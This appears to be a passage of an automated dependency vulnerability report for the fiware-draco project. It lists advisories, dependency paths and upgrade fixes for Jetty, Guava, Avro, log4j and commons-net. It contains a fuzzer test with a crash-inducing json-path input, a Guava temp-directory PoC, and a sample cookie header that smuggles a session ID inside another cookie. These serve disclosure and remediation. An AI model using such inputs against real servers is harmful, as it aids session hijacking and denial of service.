import org.junit.Test;
public class CriteriaFuzzerWhere1 {
    // Stack overflow
    @Test
    public void whereFuzzerTest() {
        try {
            Criteria result = Criteria.where("[']',");
        } catch (Exception e) {
        }
    }
}

Remediation

Upgrade com.jayway.jsonpath:json-path to version 2.9.0 or higher.

References

low severity

Information Exposure

  • Vulnerable module: commons-net:commons-net
  • Introduced through: org.apache.nifi:nifi-socket-utils@1.15.3 and org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 commons-net:commons-net@3.6
    Remediation: Upgrade to org.apache.nifi:nifi-socket-utils@1.19.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 commons-net:commons-net@3.6
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.

Overview

Affected versions of this package are vulnerable to Information Exposure as the FTP client trusts the host from PASV responses by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client.

Remediation

Upgrade commons-net:commons-net to version 3.9.0 or higher.

References

low severity

Man-in-the-Middle (MitM)

  • Vulnerable module: log4j:log4j
  • Introduced through: org.slf4j:slf4j-log4j12@1.7.32

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.slf4j:slf4j-log4j12@1.7.32 log4j:log4j@1.2.17

Overview

log4j:log4j is a 1.x branch of the Apache Log4j project. Note: Log4j 1.x reached End of Life in 2015, and is no longer supported.

Affected versions of this package are vulnerable to Man-in-the-Middle (MitM). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.

Remediation

There is no fixed version for log4j:log4j.

References

low severity

Improper Input Validation

  • Vulnerable module: org.apache.avro:avro
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-avro-record-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.avro:avro@1.11.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-avro-record-utils@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.24.0.

Overview

org.apache.avro:avro is an Avro core components

Affected versions of this package are vulnerable to Improper Input Validation when deserializing untrusted or corrupted data. An attacker can consume memory beyond the allowed constraints, resulting in the system being out of memory.

Remediation

Upgrade org.apache.avro:avro to version 1.11.3 or higher.

References

low severity

Arbitrary Code Execution

  • Vulnerable module: org.eclipse.jetty:jetty-servlets
  • Introduced through: org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlets@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.

Overview

org.eclipse.jetty:jetty-servlets is an Utility Servlets from Jetty

Affected versions of this package are vulnerable to Arbitrary Code Execution. If a user sends a request to a org.eclipse.jetty.servlets.CGI Servlet for a binary with a space in its name, the servlet will escape the command by wrapping it in quotation marks.

Impact:

This behavior may bypass alias checks, and it may cause other unintended behaviors if a command prefix is configured.

Note:

In Jetty 9.x, 10.x, and 11.x the org.eclipse.jetty.servlets.CGI has been deprecated.

In Jetty 12 (all environments) the org.eclipse.jetty.servlets.CGI has been entirely removed.

PoC

if (execCmd.length() > 0 && execCmd.charAt(0) != '"' && execCmd.contains(" "))
execCmd = "\"" + execCmd + "\"";

Remediation

Upgrade org.eclipse.jetty:jetty-servlets to version 9.4.52, 10.0.16, 11.0.16 or higher.

References

low severity

Creation of Temporary File in Directory with Insecure Permissions

  • Vulnerable module: com.google.guava:guava
  • Introduced through: com.google.inject:guice@4.0 and org.apache.nifi:nifi-record-serialization-services@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.google.inject:guice@4.0 com.google.guava:guava@27.0.1-jre
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.google.guava:guava@27.0.1-jre
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.16.0.

Overview

com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset,immutable collections, a graph library, functional types, an in-memory cache and more.

Affected versions of this package are vulnerable to Creation of Temporary File in Directory with Insecure Permissions due to the use of Java's default temporary directory for file creation in FileBackedOutputStream. Other users and apps on the machine with access to the default Java temporary directory can access the files created by this class. This more fully addresses the underlying issue described in CVE-2020-8908, by deprecating the permissive temp file creation behavior.

NOTE: Even though the security vulnerability is fixed in version 32.0.0, the maintainers recommend using version 32.0.1, as version 32.0.0 breaks some functionality under Windows.

Remediation

Upgrade com.google.guava:guava to version 32.0.0-android, 32.0.0-jre or higher.

References

low severity

Information Disclosure

  • Vulnerable module: com.google.guava:guava
  • Introduced through: com.google.inject:guice@4.0 and org.apache.nifi:nifi-record-serialization-services@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.google.inject:guice@4.0 com.google.guava:guava@27.0.1-jre
    Remediation: Upgrade to com.google.inject:guice@5.0.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.google.guava:guava@27.0.1-jre
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.16.0.

Overview

com.google.guava:guava is a set of core libraries that includes new collection types (such as multimap and multiset,immutable collections, a graph library, functional types, an in-memory cache and more.

Affected versions of this package are vulnerable to Information Disclosure. The file permissions on the file created by com.google.common.io.Files.createTempDir allow an attacker running a malicious program co-resident on the same machine to steal secrets stored in this directory. This is because, by default, on unix-like operating systems the /tmp directory is shared between all users, so if the correct file permissions aren't set by the directory/file creator, the file becomes readable by all other users on that system.

PoC

File guavaTempDir = com.google.common.io.Files.createTempDir();
System.out.println("Guava Temp Dir: " + guavaTempDir.getName());
runLS(guavaTempDir.getParentFile(), guavaTempDir); // Prints the file permissions -> drwxr-xr-x
File child = new File(guavaTempDir, "guava-child.txt");
child.createNewFile();
runLS(guavaTempDir, child); // Prints the file permissions -> -rw-r--r--

For Android developers, choosing a temporary directory API provided by Android is recommended, such as context.getCacheDir(). For other Java developers, we recommend migrating to the Java 7 API java.nio.file.Files.createTempDirectory() which explicitly configures permissions of 700, or configuring the Java runtime's java.io.tmpdir system property to point to a location whose permissions are appropriately configured.

Remediation

There is no fix for com.google.guava:guava. However, in version 30.0 and above, the vulnerable functionality has been deprecated. In oder to mitigate this vulnerability, upgrade to version 30.0 or higher and ensure your dependencies don't use the createTempDir or createTempFile methods.

References

low severity

Improper Input Validation

  • Vulnerable module: org.eclipse.jetty:jetty-client
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.

Overview

org.eclipse.jetty:jetty-client is an is an asynchronous http client module fro jetty server.

Affected versions of this package are vulnerable to Improper Input Validation due to improper URI paring in the HttpURI class.

Remediation

Upgrade org.eclipse.jetty:jetty-client to version 9.4.47, 10.0.10, 11.0.10 or higher.

References

low severity

Improper Input Validation

  • Vulnerable module: org.eclipse.jetty:jetty-http
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1 and org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.17.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlets@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.17.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.17.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.17.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.17.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.17.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.17.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.17.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.17.0.

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Improper Input Validation due to improper URI paring in the HttpURI class.

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.47, 10.0.10, 11.0.10 or higher.

References

low severity

Information Exposure

  • Vulnerable module: org.eclipse.jetty:jetty-http
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1 and org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.6.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlets@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.6.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.6.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.6.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Information Exposure such that nonstandard cookie parsing may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with " (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. Exploiting this vulnerability results in cookies exfiltration and policy based on cookies bypass.

Note: A cookie header such as: DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d" will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies.

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.51, 10.0.14, 11.0.14, 12.0.0.beta0 or higher.

References

low severity

Information Exposure

  • Vulnerable module: org.eclipse.jetty:jetty-server
  • Introduced through: org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927
